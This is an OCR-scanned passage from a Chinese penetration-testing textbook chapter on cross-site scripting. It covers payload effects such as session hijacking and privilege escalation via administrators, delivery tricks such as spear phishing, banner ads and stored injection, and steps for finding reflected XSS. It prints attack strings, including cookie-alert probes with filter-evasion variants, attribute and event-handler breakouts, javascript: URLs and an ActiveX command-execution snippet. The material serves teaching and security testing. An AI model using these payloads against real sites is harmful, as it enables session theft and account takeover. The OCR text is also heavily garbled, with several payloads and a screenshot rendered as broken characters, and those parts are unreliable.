他 们 的 信用 卡 信息 。 例 如 ， 图 12-7 是 一 个 由 Jim Ley 设 计 的 概念 验证 攻 
击 ， 它 利用 了 2004 年 在 Google 中 发 现 的 一 种 反射 型 XSS 漏 洞 。 
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图 12-7 ”一 次 注入 木马 功能 的 反射 型 XSS 攻 击 





由 于 这 些 攻击 中 的 URL 指 向 真实 应 用 程序 的 可 信 域 名 ， 如 果 在 必要 
时 使 用 有 效 的 SSL 证 书 ， 它 们 就 比 纯粹 的 钓鱼 Web 站 点 更 有 可 能 说 服 受 
害 者 提交 敏感 信息 ; 后 者 通常 位 于 男 一 个 域 中 ， 而 且 只 是 克隆 目标 Web 
站 点 的 内 容 。 

3. 诱 使 用 户 执 行 操作 

如 果 攻 击 者 动 持 受害 者 的 会 话 ， 那 么 他 就 可 以 “作为 ”该 用 户 使 用 应 
用 程序 ， 并 代表 这 名 用 户 执 行 任何 操作 。 但 是 ， 这 种 执行 任意 操作 的 方 
法 并 不 总 能 达到 想 要 的 目的 。 它 要 求 攻击 者 监控 他 们 自己 的 服务 器 ， 看 
其 是 否 收 到 被 攻破 的 用 户 的 会 话 令 牌 ; 而 且 ， 它 还 要 求 他 们 代表 每 一 名 
用 户 执行 相 关 操 作 。 如 果 要 癌 许 多 用 户 实 施 攻击 ， 这 种 方法 并 不 可 行 。 
而 且 ， 它 在 应 用 程序 的 日 志 中 留 下 相当 明显 的 痕迹 ， 用 户 在 调查 过 程 中 
利用 它 可 迅速 确定 执行 未 授权 操作 的 计算 机 。 

如 果 攻 击 者 想 要 代表 每 位 被 攻破 的 用 户 执行 一 组 特殊 的 操作 ， 就 可 
以 采用 另 一 种 劫持 会 话 的 方法 ， 即 利用 攻击 有 效 载荷 脚本 执行 操作 。 如 
果 攻 击 者 想 要 执行 某 个 需要 管理 权限 的 操作 ， 如 修改 他 控制 的 一 个 账户 
的 权限 ， 这 种 方法 特别 有 用 。 由 于 用 户 众 多 ， 要 劫持 每 名 用 户 的 会 话 并 


























确定 其 是 否 为 管理 员 ， 可 能 需要 付出 极 大 的 努力 。 一 种 更 加 有 效 的 方法 
是 ， 诱 使 每 个 被 攻破 的 用 户 尝试 升级 攻击 者 账户 的 权限 。 大 多 数 尝试 都 
会 失败 ， 但 如 果 一 个 管理 用 户 被 攻破 ， 攻 击 者 就 能 够 成 功 提升 他 的 权 

限 。 我 们 将 在 13.1.1 节 说 明 各 种 诱 使 其 他 用 户 执行 操作 的 方法 。 

前 面 描述 的 MySpace XSS 蠕 虫 就 是 这 种 攻击 有 效 载 荷 的 一 个 典型 示 
例 ， 同 时 ， 它 说 明 这 种 攻击 者 可 以 毫 不 费力 就 代表 大 量 用 户 执行 未 授权 
操作 的 严重 性 。 这 种 攻击 利用 一 系列 采用 Ajax 技术 的 复杂 请 求 〈 如 第 3 
章 所 述 ) 来 执行 传播 蠕虫 所 需 的 各 种 操作 。 

如 果 攻 击 者 的 主要 目标 为 应 用 程序 ， 并 且 希 望 在 攻击 时 尽 可 能 地 保 
持 隐 秘 ， 他 就 可 以 利用 这 种 类 型 的 XSS 攻 击 有 效 载荷 让 其 他 用 户 执行 他 
选择 的 、 针 对 应 用 程序 的 恶意 操作 。 例 如 ， 攻 击 者 可 以 促使 其 他 用 户 利 
用 一 个 SQL 注入 漏洞 在 数据 库 的 用 户 账户 表 中 添加 一 个 新 的 管理 员 用 
户 。 然 后 ， 攻 击 者 就 可 以 控制 这 个 新 账户 ， 通 过 它 执行 恶意 操作 ， 但 
是 ， 任 何 对 应 用 程序 日 志 的 调查 结论 却 将 怀疑 对 象 指向 这 名 新 建 的 用 
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4. 利用 信任 关系 

上 文 已 经 介绍 了 可 被 XSS 利 用 的 一 种 重要 的 信任 关系 : 浏览 器 信任 
由 发 布 cookie 的 Web 站 点 提交 的 JavaScript。 有 时 ， 在 XSS 攻 击 中 还 可 以 
利用 其 他 一 些 信任 关系 。 

口 如 果 应 用 程序 采用 激活 自动 完成 功能 的 表单 ， 由 应 用 程序 提交 的 
JavaScript 就 可 以 截获 任何 以 前 输入 的 、 用 户 浏 览 器 保存 在 上 自动 完成 缓存 
中 的 数据 。 通 过 示例 化 相关 表单 ， 等 竺 浏览 器 上 自动 完成 它 的 内 容 ， 然 后 
查询 表单 字段 值 ， 上 述 JavaScript 脚 本 惑 能 够 贸 取 这 些 数据 并 将 其 传送 至 
攻击 者 的 服务 器 。 这 种 攻击 比 注 入 木马 功能 更 加 强大 ， 因 为 它 不 需要 用 
户 执 行 任何 操作 就 可 以 截获 敏感 数据 。 

口 一 些 Web 应 用 程序 推荐 或 要 求 用 户 把 其 域名 添加 到 浏览 器 的 “可 
言 站 点 ”区 域内 。 这 种 要 求 几 乎 总 会 造成 不 利 影响 ， 并 意味 着 攻击 者 可 
以 利用 任何 XSS 类 型 的 漏洞 在 受害 用 户 的 计算 机 上 执行 任意 代码 。 例 
如 ， 如 果 一 个 站 点 在 Internet Explorer 的 可 信 站 点 区 域内 运行 ， 那 么 注入 
以 下 代码 将 会 在 用 户 的 计算 机 上 启动 Windows 计 算 器 程序 。 


<script> 

















var o = new ActivexXObject('WScript.shell'); 
o.Run('calc.exe'); 
</script> 
口 Web 应 用 程序 通常 采用 包含 强大 方法 的 ActiveX 控 件 〈( 请 参阅 第 13 
Be) 。 一 些 应 用 程序 在 该 控件 内 核实 调用 的 Web 页 面 确实 属于 正确 的 





Web 站 点 ， 力 求 防止 第 三 方 滥用 这 种 控件 。 在 这 种 情况 下 ， 通 过 XSS 攻 
A a ee ae ee ey dee 
YHE o 


> 错误 观点 “钓鱼 与 XSS 攻 击 只 会 影响 公众 因特网 上 的 应 用 
程序 。” 

XSS 漏 洞 可 以 影响 任何 类 型 的 Web 应 用 程序 ; 通过 一 封 群发 电 
子 邮 件 传送 的 针对 内 联网 应 用 程序 的 攻击 可 以 利用 两 种 形式 的 信任 
关系 。 首 先 ， 在 同事 之 间 传 送 的 内 部 电子 邮件 利用 他 们 之 间 的 社交 
信任 关系 。 其 次 ， 与 公众 因特网 上 的 Web 服 务 器 相 比 ， 受 害 者 的 浏 
览 句 往往 会 更 加 信任 企业 Web 服 务 咒 。 例 如 ， 如 宁 一 台 计 算 机 属于 
企业 域 的 一 部 分 ， 那 么 在 访问 内 联网 应 用 程序 时 ， 浏 览 器 会 默认 使 
用 较 低 的 安全 级 别 。 


5. 扩大 客户 端 攻 击 范 围 

攻击 者 可 以 采用 各 种 方式 直接 攻击 访问 一 个 Web 站 点 的 用 户 。 所 有 
这 些 攻击 都 可 以 通过 易 受 攻击 的 应 用 程序 中 的 一 个 路 站 点 脚本 漏洞 伟 
送 ， 当 然 ， 用 户 偶 然 访问 的 任何 恶意 站 点 也 可 以 直接 传送 它们 。 我 们 会 
在 第 13 章 的 最 后 详细 介绍 这 种 类 型 的 攻击 。 


12.2.3  XSS! 和 传世 | 


确定 一 个 XSS 漏 洞 并 设计 出 利用 它 的 适当 有 效 载荷 后 ， 攻 击 者 需要 
找 出 办 法 回应 用 程序 的 其 他 用 户 传 送 攻 击 。 我 们 在 前 面 已 经 讨论 了 几 种 
传送 方法 。 实 际 上 ， 攻 击 者 还 可 以 使 用 其 他 许多 传送 机 制 。 

1. 传送 反射 型 与 基于 DOM 的 XSS 攻 击 

除了 通过 电子 邮件 向 随机 用 户 大 量 发 送 专门 设计 的 URL 这 种 明显 的 
钓鱼 向 量 外 ， 攻 击 者 还 可 以 尝试 使 用 以 下 机 制 传送 反射 型 或 基于 DOM 
的 XSS 攻 击 。 

口 在 有 和 针对 性 的 攻击 中 ， 攻 击 者 可 以 同 个 体 目标 用 户 或 少数 几 名 用 
户 发 送 一 封 伪造 的 电子 邮件 。 例 如 ， 可 以 向 管理 员 发 送 一 封 明显 由 已 知 
用 户 送 出 的 电子 邮件 ， 抱 怨 某 个 特殊 的 URL 造 成 错误 。 如 果 攻 击 者 想 要 
攻破 某 个 特殊 用 户 的 会 话 〔( 而 非 截取 随机 用 户 的 会 话 ) ， 实 施 合 理 、 可 
靠 的 针对 性 攻击 往往 是 最 有 效 的 传送 机 制 。 有 时 我 们 也 把 这 类 攻击 称 
为 “ 鱼 叉 式 钓 鱼 ”。 














口 可 以 在 即时 消息 中 辐 目 标 用 户 提 供 一 个 URL。 

口 第 三 方 Web 站 点 上 的 内 容 与 代码 可 用 于 生成 触发 XSS 漏 洞 的 请 
求 。 各 种 常见 的 应 用 程序 允许 用 户 发 布 数量 有 限 的 HTML 标记 ， 这 些 标 
记 将 按 原 样 癌 其 他 用 户 显 示 。 如 果 可 以 使 用 GET 方 法 触发 XSS 漏 洞 ， 攻 
击 者 就 可 以 在 第 三 方 站 点 上 发 布 一 个 指向 某 恶 意 UREL 的 IMG 标 签 ， 任 何 
查看 以 上 第 三 方 内 容 的 用 户 将 在 不 知情 的 情况 下 请 求 该 恶意 URL。 

或 者 ， 攻 击 者 可 以 创建 自己 的 Web 站 点 ， 在 其 中 包含 诱 使 
用 户 访问 的 有 趣 内 容 ， 但 也 可 能 含有 一 些 肢 本， 导致 用 户 的 浏 
览 器 癌 易 受 攻击 的 应 用 程序 提出 包含 XSS 有 效 载荷 的 请 求 。 如 
果菜 用 户 登 录 以 上 易 受 攻击 的 应 用 程序 ， 并 且 磁 巧 浏览 了 攻击 
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建立 适当 的 Web 站 点 后 ， 攻 击 者 可 以 使 用 搜索 引擎 操纵 技 
巧 生 成 某 些 用 户 提交 的 访问 ， 例 如 ， 将 相关 关键 字 放 入 站 点 内 
容 中 并 使 用 相关 表达 式 将 其 链接 到 相关 站 点 。 但 是 ， 这 种 传送 
人 na ere 

注意 ， 这 种 传送 机 制 使 得 攻击 者 可 利用 只 通过 POST 请 求 
触发 的 反射 型 与 基于 DOM 的 XSS 漏 洞 。 但 是 ， 利 用 这 些 漏 洞 ， 
攻击 者 明显 不 能 通过 同 受害 用 户 发 送 一 个 简单 的 URL 来 传送 一 
次 攻击 。 然 而 ， 某 个 恶意 Web 站 点 可 能 包含 一 个 HTML 表 单 ， 
它 使 用 POST 方法 并 以 易 受 攻击 的 应 用 程序 作为 它 的 目标 
URL。 其 页 面 上 的 JavaScript 或 导航 控件 可 用 于 提交 表单 ， 成 功 
利用 漏洞 。 

口 在 另 一 种 利用 第 三 方 Web 站 点 的 攻击 中 ， 一 些 攻 击 者 付费 购买 许 
多 链接 至 一 个 URL 的 横幅 广告 ， 该 URL 中 包含 一 个 针对 某 易 受 攻击 的 应 
用 程序 的 XSS 有 效 载荷 。 如 果 一 名 用 户 登 录 这 个 易 受 攻击 的 应 用 程序 ， 
并 单 击 广告 ， 那 么 他 登录 该 应 用 程序 的 会 话 就 会 被 攻破 。 因 为 许多 提供 
商 使 用 关键 字 将 广告 分 配给 与 其 有 关 的 页 面 ， 有 时 就 会 出 现 这 样 的 情 
况 : 一 个 攻击 特定 应 用 程序 的 广告 恰巧 被 分 配 在 这 个 应 用 程序 的 页 面 
中 。 这 不 仅 提高 了 攻击 的 可 信 性 ， 而 且 还 可 以 确保 在 攻击 者 实施 攻击 
时 ， 单 击 广 告 的 用 户 正 在 使 用 那个 易 受 攻击 的 应 用 程序 。 此 外 ， 由 于 目 
标 URL 现 在 为 “本 站 点 ”URL， 该 攻击 能 够 避 开 用 于 防范 XSS 的 基于 浏览 
器 的 机 制 〈 将 在 本 章 后 面部 分 详细 介绍 ) 。 另 外 ， 由 于 许多 横幅 广告 提 
供 商 按 点 击 率 收 费 ， 这 种 技巧 使 得 攻击 者 能 够 “ 买 进 ?大量 用 户 会 话 。 

口 许 多 应 用 程序 执行 一 种 “推荐 给 朋友 ”或 同 站 点 管理 员 发 送 反 馈 的 
功能 。 这 种 功能 通常 允许 用 户 生 成 一 封 电子 邮件 ， 其 内 容 与 收 件 人 均 可 



































自由 设置 。 攻 击 者 能 够 利用 这 种 功能 ， 通 过 一 封 实际 源 自 自己 服务 器 的 
电子 邮件 传送 XSS 攻 击 ， 提 高 邮件 被 技术 熟练 的 用 户 与 反 恶 意 软 件 的 软 
件 接受 的 可 能 性 。 

2. 传送 保存 型 XSS 攻 击 

保存 型 XSS 攻 击 共有 两 种 传送 机 制 : TAS AMIS DL 

带 内 传送 机 制 适 用 于 大 多 数 情 况 ， 这 时 漏洞 数据 通过 主 Web 界 面 提 
交 给 应 用 程序 。 用 户 控 制 的 数据 最 终 显示 给 其 他 用 户 的 常见 位 置 包含 : 
口 个 人 信息 字段 ， 如 姓名 、 地 址 、 电 子 邮 件 、 电 话 等 ; 

口 文 档 、 上 传 文 件 及 其 他 数据 的 名 称 ; 

口 提交 给 应 用 程序 管理 员 的 反馈 或 问题 ; 

o 同 其 他 应 用 程序 用 户 传送 的 消 上 月 、 注 释 、 问 题 等 ; 

口 记 录 在 应 用 程序 日 志 中 ， 并 通过 浏览 器 显示 给 管理 员 的 任何 内 
容 ， 如 URL、 用 户 名 、HTTP Referer. User-Agent 等 ; 

口 在 用 户 之 间 共 享 的 上 传 文件 内 容 。 

在 这 些 情况 下 ， 只 需 辐 应 用 程序 页 面 提 交 XSS 有 效 载 荷 ， 然 后 等 待 
受害 者 查看 恶 音 代码， 就 可 以 传送 XSS 有 效 载 答 。 

带 外 传送 机 制 适 用 于 通过 其 他 渠道 回应 用 程序 提交 漏洞 数据 的 情 
况 。 应 用 程序 通过 这 种 渠道 接收 数据 ， 并 最 终 在 主 Web 界 面 生成 的 
HTML 页 面 中 显示 它 。 前 面 描述 的 针对 Web 邮 件 应 用 程序 的 攻击 就 是 这 
种 传送 机 制 的 典型 示例 。 这 种 攻击 同一 个 SMTP 服 务 器 传送 恶意 数据 ， 
并 最 终 在 一 条 HTML 格 式 的 电子 邮件 消息 中 同 用 户 显 示 这 些 数据 。 

3. 链接 XSS 与 其 他 攻击 

XSS 漏 洞 有 时 可 与 其 他 漏洞 链接 在 一 起 ， 造 成 破坏 性 的 后 果 。 笔 者 
曾 遇 到 一 个 应 用 程序 ， 它 的 用 户 有 昵称 中 存在 一 个 保存 型 XSS 漏 洞 。 这 个 
数据 的 唯一 用 途 是 在 用 户 登 录 后 显示 一 条 个 性 化 欢迎 消 加 。 该 昵称 从 不 
同 其 他 应 用 程序 用 户 显 示 ， 因 此 ， 最 初 似 乎 没有 任何 攻击 同 量 会 致使 用 
户 在 编辑 昵称 时 造成 问题 。 在 其 他 各 点 都 相同 的 情况 下 ， 这 种 漏洞 属于 
风险 极 低 的 漏洞 。 

但 是 ， 该 应 用 程序 还 存在 另 一 个 漏洞 。 由 于 访问 控制 存在 缺陷 ， 任 
何 用 户 都 可 以 编辑 其 他 用 户 的 昵称 。 同 样 ， 这 个 问题 本 身 并 不 严重 。 有 
哪个 攻击 者 会 对 修改 其 他 用 户 的 昵称 感 兴趣 呢 ? 

然而 ， 如 果 将 这 两 个 低 风险 的 漏洞 链接 在 一 起 ， 攻 击 者 就 可 以 完全 
控制 应 用 程序 。 首 先 ， 攻 击 者 只 需 设计 一 个 自动 攻击 ， 在 每 个 应 用 程序 
用 户 的 昵称 中 注入 一 段 脚 本 。 每 次 用 户 登 录 应 用 程序 ， 这 段 脚 本 就 会 执 
行 ， 并 将 该 用 户 的 会 话 令 牌 传送 到 攻击 者 控制 的 服务 器 中 。 应 用 程序 的 
一 些 用 户 为 管理 员 ， 他 们 经 常 登录 ， 能 够 创建 新 用 户 并 修改 其 他 用 户 的 
权限 。 攻 击 者 只 需 等 待 一 名 管理 员 登 录 ， 劫 持 管 理 员 的 会 话 ， 然 后 升级 





















































自己 的 账户 ， 获 得 管理 权限 。 因 此 ， 这 两 个 漏洞 同时 出 现 会 给 应 用 程序 
的 安全 造成 极 大 的 风险 。 

在 另 一 个 示例 中 ， 仅 同 提 交 它 们 的 用 户 显 示 的 数据 可 以 通过 路 站 请 
求 伪 造 攻 击 〈 请 参阅 第 13 章 了 解 详 细 信 息 ) 进行 更 新 。 同 时 ， 应 用 程序 
中 还 包含 保存 型 XSS 漏 洞 。 同 样 ， 如 果 单 独 出 现 ， 这 两 个 漏洞 的 风险 相 
ao 如 果 被 攻击 者 结合 在 一 起 加 以 利用 ， 它 们 就 可 能 会 造成 
r IFADE 








w 错误 观点 “我 们 不 必 担 心 低 风险 XSS 漏 洞 ， 用 户 只 能 利用 
TAEAO.: ” 

如 上 所 述 ， 在 适当 的 情况 下 ， 即 使 是 明显 低 风险 的 漏洞 ， 也 会 
为 更 具 破 坏 性 的 攻击 打下 基础 。 实 施 深层 安全 防御 必须 删除 每 一 个 
已 知 的 漏洞 ， 无 论 它 多 么 无 关 紧 要 。 和 笔者 就 曾 利用 XSS 在 页 面 啊 应 
中 插入 文件 浏览 器 对 话 框 或 AcitveX 控 件 ， 侵 入 与 目标 Web 应 用 程 
序 绑 定 在 一 起 的 Kiosk 模 式 系统 。 在 想 出 办 法 利用 细微 漏洞 方面 ， 
渗透 测试 员 应 该 始终 假定 攻击 者 比 上 自己 更 富有 想象 力 。 








确定 XSS 漏 洞 的 基本 方法 是 使 用 下 面 这 个 概念 验证 攻击 字符 串 : 
"><script>alert (document.cookie)</script> 


这 个 字符 串 被 提交 给 每 个 应 用 程序 页 面 中 的 每 一 个 参数 ， 同 时 ， 攻 
击 者 监控 它 的 啊 应 ， 看 其 中 是 否 出 现 相同 的 字符 串 。 如 果 发 现 攻击 字符 
串 按 原样 出 现在 啊 应 中 ， 几 乎 可 以 肯定 应 用 程序 存在 XSS 漏 洞 。 

如 果 仅 仅 是 为 了 尽 可 能 快 地 确定 应 用 程序 中 存在 的 某 种 XSS 漏 洞 ， 
以 同 其 他 应 用 程序 用 户 实施 攻击 ， 那 么 这 个 基本 方法 可 能 是 最 为 有 效 的 
方法 ， 因 为 它 可 以 实现 高 度 自动 化 ， 而 且 很 少 生成 错误 警报 。 但 是 ， 如 
果 是 对 应 用 程序 进行 复杂 的 测试 ， 从 而 确定 尽 可 能 多 的 漏洞 ， 那 么 在 应 
用 基本 方法 的 同时 ， 还 需要 组 合 使 用 更 加 复杂 的 技巧 。 在 以 下 几 种 情况 
下 ， 通 过 基本 的 检测 方法 可 能 无 法 确定 应 用 程序 中 存在 的 XSS 漏 洞 。 

口 许 多 应 用 程序 实施 基于 黑 名 单 的 初步 过 滤 ， 试 图 阻止 XSS 攻 击 。 
通常 ， 这 些 过 滤 在 请 求 参 数 中 寻找 <script> 之 类 的 表达 式 ， 并 采取 一 些 
防御 措施 ， 如 删除 或 编码 表达 式 ， 或 者 完全 阻止 这 类 请 求 。 基 本 检测 方 
法 中 常用 的 攻击 字符 串 往 往 被 这 些 过 滤 阻 止 。 但 是 ， 仅 仅 因 为 一 个 常见 
的 攻击 字符 串 被 阻止 ， 并 不 能 证 明 一 个 可 利用 的 漏洞 不 存在 。 如 后 文 所 
述 ， 在 有 些 情况 下 ， 不 使 用 <script> 标 签 ， 甚 至 不 使 用 "< > 和 /这 些 常 被 
过 滤 挤 的 字符 ， 也 可 以 利用 XSS 漏 洞 。 

口 许 多 应 用 程序 实施 的 防 XSS 过 滤 存 在 缺陷 ， 可 以 通过 各 种 方法 避 
开 。 例 如 ， 假 设 在 处 理 用 户 输入 前 ， 应 用 程序 删除 其 中 出 现 的 所 有 
<script> 标 签 。 这 意味 着 基本 方法 中 使 用 的 攻击 字符 串 将 不 会 在 应 用 程 
序 的 啊 应 中 返回 。 但 是 ， 以 下 一 个 或 几 个 字符 串 可 轻易 避 开 过 滤 ， 成 功 
利用 XSS 漏 洞 : 


"><script >alert(document.cookie)</script > 























"><ScRiPt>alert (document.cookie)</ScRiPt> 
"S3e$3cscripttz3ealert (document.cookie) $3c/scriptt3e 
"><ser<script>ipt>alert (document. cookie)</scer</script>ipt> 


$00"><seript>alert (document .cookie) </script> 


Al yn) 
笑 试 访问 
http://mdsec.net/search/28/ 


http://mdsec.net/search/36/ 
http://mdsec.net/search/21/ 


注意 ， 在 这 些 情况 下 ， 在 服务 器 的 啊 应 中 ， 输 入 的 字符 串 返 回 前 ， 
可 能 经 过 净化 、 编 码 或 其 他 形式 的 修改 ， 因 而 还 不 足以 实现 对 XSS 漏 洞 
的 利用 。 这 时 ， 提 交 一 个 特殊 字符 串 并 检查 它 是 否 在 服务 器 的 啊 应 中 出 
现 的 基本 检测 方法 将 无 法 成 功 友 现 漏 洞 。 

当 利 用 基于 DOM 的 XSS 漏 洞 时 ， 攻 击 有 效 载荷 并 不 在 服务 器 的 啊 应 
中 返回 ， 而 是 保存 在 浏览 器 DOM 中 ， 并 可 被 客户 端 JavaScript 访 问 。 同 
样 ， 在 这 种 情况 下 ， 提 交 一 个 特殊 字符 串 并 检查 它 是 否 在 服务 器 的 响应 














中 出 现 的 基本 检测 方法 将 无 法 成 功 发 现 漏洞 。 
12.3.1 ER ŽA HRA XSSR 











要 探查 反射 型 XSS 漏 铜 ， 最 可 靠 的 方法 是 系统 性 地 检查 在 解析 应 用 
程序 (请 参阅 第 4 章 ) 过 程 中 确定 的 所 有 用 户 和 输入 进入 点 ， 并 遭 循 以 下 
步骤 。 

口 在 每 个 进入 点 提交 一 个 展 性 字母 字符 串 。 

口 确 定 此 字符 串 “ 反 射 ? 在 应 用 程序 啊 应 中 的 所 有 位 置 。 

口 对 于 每 个 反射 ， 确 定 显 示 反 射 型 数据 时 的 语法 上 下 文 。 

反射 的 语法 上 下 文 而 修改 的 数据 ， 演 试 在 啊 应 中 引入 任 
意 脚本 。 

口 如 宋 反 射 型 数据 被 阻 正 或 净 化 ， 导 致 脚本 无 法 执行 ， 则 答 试 了 解 
并 避 开 应 用 程序 的 防御 性 过 滤 。 

1. 确认 用 户 输 入 的 反射 

检 训 反射 型 XSS 漏 洞 的 最 可 靠 方法 的 初始 步骤 与 前 面 描述 的 基本 方 
法 类 似 。 














渗透 测试 步 又 


D 选择 任意 一 个 字符 串 ， 该 字符 串 不 曾 出 现在 应 用 程序 的 
任何 地 方 ， 而 且 其 中 仅 包含 字母 字符 ， 因 此 不 可 能 受到 针对 XSS 过 
小 的 影响 。 例 如 : 





提交 这 个 字符 串 ， 以 其 作为 每 个 页 面 的 每 一 个 参数 ， 且 每 次 只 
针对 一 个 参数 。 

(2) 监控 应 用 程序 的 啊 应 ， 看 其 中 是 否 出 现 同一 个 字符 串 。 
记 下 参数 值 被 复制 到 应 用 程序 啊 应 中 的 每 一 个 参数 。 这 些 参数 不 一 
i EEA 
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(3) 注意 ， 必 须 测试 所 有 GET 与 POST 请 求 ， 检 查 URL 查 询 字 
符 串 与 消息 主体 中 的 每 一 个 参数 。 虽 然 有 少数 XSS 漏 洞 传送 机 制 只 
人 
所 述 。 

(4) 任何 时 候 ， 一 旦 在 POST 请 求 中 发 现 XSS， 应 使 用 Burp 中 
的 “更 改 请 求 方法 ”(change request method) 选项 确定 是 否 可 以 通过 
GET 请 求实 施 相同 的 攻击 。 

(5) 除 标准 的 请 求 参 数 外 ， 还 应 该 检测 HTTP 请 求 消息 头 内 容 
被 应 用 程序 处 理 的 每 一 种 情况 。 有 一 种 第 见 的 XSS 漏 洞 出 现在 错误 
消息 中 ， 这 时 Referer 与 User-Agent 消 息 头 之 类 的 数据 项 被 复制 到 消 
上 的 内 容 中 。 这 些 消息 头 是 传送 反射 型 XSS 攻 击 的 有 效 工 具 ， 因 为 
攻击 者 可 以 使 用 一 个 Flash 对 象 户 使 受害 者 提出 一 个 包含 任意 HTTP 
消息 头 的 请 求 。 


2. 测试 引入 脚本 的 反射 
渗透 测试 员 必 须 手动 检查 已 确定 的 每 一 个 反射 型 输入 实例 ， 以 核实 


























其 是 否 确 实 可 被 利用 。 在 咽 应 中 包含 反射 型 数据 的 每 个 位 置 ， 者 需要 确 
认 该 数据 的 语法 特点 。 这 时 ， 渗 透 测 试 员 必 须 找到 某 种 修改 输入 的 方 
法 ， 以 便 在 将 输入 复制 到 应 用 程序 啊 应 中 的 相同 位 置 时 ， 任 何 脚本 都 能 
够 得 以 执行 。 下 面 分 析 这 方面 的 一 些 示例 。 


9 例 1: 标签 属性 值 


假设 返回 的 页 面 中 包含 以 下 脚本 : 
<input type="text" name="addressl" value="myxsstestdmglwp"> 


很 明显 ， 利 用 XSS 的 一 种 方法 是 终止 包含 字符 串 的 双 引 号 ， 结 束 
<input> 标 签 ， 然 后 通过 其 他 方法 引入 JavaScript 脚 本 (使 用 <script> 
等 ) 。 例 如 : 


"><script>alert(1)</script> 


在 这 种 情况 下 ， 另 一 种 可 以 避 开 某 些 输入 过 滤 的 利用 方法 ， 是 在 
<input> 标 签 内 注入 一 个 包含 JavaScript 的 事件 处 理 器 。 例 如 : 


" onfocus="alert(1) 


@ 例 2: JavaScript FF # 
假设 返回 的 页 面 中 包含 以 下 脚本 : 


<script>var a = 'myxsstestdmalwp'; var b = 123; ... </script> 


这 时 ， 受 控制 的 字符 串 补 直接 插入 到 现 有 的 一 段 脚本 中 。 要 利用 
XSS， 可 以 终止 字符 串 周围 的 单 引 写 ， 用 一 个 分 与 终止 整个 语句 ， 然 后 
直接 处 理想 要 执行 的 JavaScript。 例 如 : 


t: g@lerttl): war foo=" 


注意 ， 因 为 已 经 终止 了 一 个 被 引用 的 字符 串 ， 为 阻止 JavaScript 解 释 
器 出 现 错误 ， 必 须 在 注入 的 代码 后 使 用 有 效 的 语法 确保 脚本 继续 正常 执 
行 。 在 这 个 示例 中 ， 变 量 foo 被 声明 ， 男 一 个 引用 字符 串 被 打开 ， 它 们 
将 被 紧 随 在 字符 串 后 面 的 代码 终止 。 另 一 种 经 常 有 效 的 方法 是 使 用 / 结 
束 输入 ， 将 剩 下 的 脚本 当做 注释 处 理 。 

9 例 3: 包含 URL 的 特性 

假设 返回 的 页 面 中 包含 以 下 脚本 : 

<a href="myxsstestdmaqlwp">Click here ...</a> 

这 时 ， 受 控制 的 字符 串 揪 入 到 一 个 <a> 标 签 的 href 属 性 中 。 在 一 些 浏 
览 器 中 ， 这 个 属性 可 能 包含 一 个 使 用 javascript: 协 议 的 URL， 从 而 可 以 使 
用 以 下 脚本 直接 利用 XSS: 





jJavascript:alert(1); 


如 前 所 述 ， 因 为 输入 将 反射 到 标签 属性 中 ， 因 此 这 时 还 可 以 注入 一 
AS BE AEE AD FH AS o 

要 同 当 前 所 有 的 浏览 器 实施 攻击 ， 可 以 同时 使 用 一 个 无 效 的 图 像 名 
称 与 一 个 onerror 事 件 处 理 器 ; 


#"onclick="javascript:alert(1) 





W ”提示 ”和 其 他 攻击 一 样 ， 渗 透 测试 员 必 须 对 请 求 中 出 现 的 
任何 特殊 字符 进行 URL 编 码 ， 包 括 & = + ; 和 空格 。 


IE MANS Te 
对 于 在 前 面 步骤 中 记 下 的 每 一 个 潜在 的 XSS 漏 洞 ， 采 取 以 下 措 
iti. 


(1) 检查 HTML 源 代码 ， 确 定 受 控制 的 字符 串 的 位 置 。 

(2) 如 果 字 符 串 出 现在 几 个 位 置 ， 应 将 每 个 位 置 当 做 一 个 潜 
在 的 漏洞 ， 分 别 进行 分 析 。 

(3) 根据 用 户 控 制 的 字符 串 在 HTML 中 的 位 置 ， 确 定 需 要 如 
何 对 其 进行 修改 以 使 任意 JavaScript 得 以 执行 。 通 常 ， 有 大 量 方 法 可 
成 为 传送 攻击 的 有 效 工 具 。 

(4) 回应 用 程序 提交 设计 的 字符 串 ， 测 试 它 是 否 有 用 。 如 果 
设计 的 字符 串 仍 然 按 原样 返回 ， 表 示 应 用 程序 存在 XSS 漏 洞 。 使 用 
一 段 概念 验证 脚本 显示 一 个 警报 对 话 框 ， 重 复 检查 语法 是 否 正确 ， 
并 确定 啊 应 显示 时 ， 对 话 框 是 否 出 现在 浏览 器 中 。 


3. REM HEN TE 
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而 无 法 成 功 执行 注入 的 JavaScript。 如 果 是 这 样 ， 不 要 放弃 ! 接 下 来 应 该 
确定 服务 器 对 输入 进行 了 哪些 处 理 。 主 要 有 以 下 3 种 可 能 的 情况 。 
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o 应 用 程序 或 者 Web 应 用 程序 防火 增 保 护 的 应 用 程序 友 现 一 个 攻击 
， 完 全 阻止 了 输入 。 
O 应 用 程序 已 经 接受 了 输入 ， 但 对 攻击 字符 串 进行 了 茶 种 净化 或 编 


O 应 用 程序 把 攻击 字符 串 截 短 至 某 个 固定 的 最 大 长 度 。 
我 们 将 分 别 分 析 每 一 种 情况 ， 并 讨论 如 果 通 过 每 种 方法 避 开 应 用 程 





序 设立 的 障碍 。 


4. 避 开 基于 签名 的 过 渡 
在 第 一 种 类 型 的 过 滤 中 ， 应 用 程序 通常 会 对 攻击 字符 串 做 出 与 无 害 








字符 串 截 然 不 同 的 响应 ， 例 如 ， 通 过 一 条 错误 消息 ， 甚 至 会 指出 发 现 一 
个 可 能 的 XSS 攻 击 ， 如 图 12-8 所 示 。 








Server Error in / Application. 


A potentiaily dangerous Request.Form value was detected from the client 
(searchbox="<asp”"). 


Description: Request Vakdstion has cetected 5 potertiely dang=ros poh value, and proces ung of the requesd has ceen aborted. This value may 
Ice i stompt to corre 00 the security of vour sopiosion, tuche mno ote Crigting stleck You con doatte re oquett y oz by estiró 
wabciateReque si=teire n the je drecive œ in ihe configurstion section. Ho , tis strongly ORAP SAN s lo ictly check of 
Pole in trad 0556 


Enception Details: Syvaon Web MipRoques: ula onExcepiion. A potentially dangerous Request Forn valve woe cktecied from the co 
£ Pe y 


Source Error 


An unhandled exception was cenerated during the #xecution of the current web request. 
intormation regarding the origin and location of the exception can be adentitied using the 
exception stack trace below. 


Stack Trace: 


证 


图 12-8 ”一 条 由 ASP.NET 反 XSS 过 滤器 生成 的 错误 消 ， 





如 果 出 现 这 种 情况 ， 那 么 接 下 来 ， 应 该 确定 输入 中 的 哪 尝 字符 或 表 
达 式 触发 了 过 滤 。 一 种 有 效 的 方法 是 轮流 删除 字符 串 的 不 同 部 分 ， 看 输 
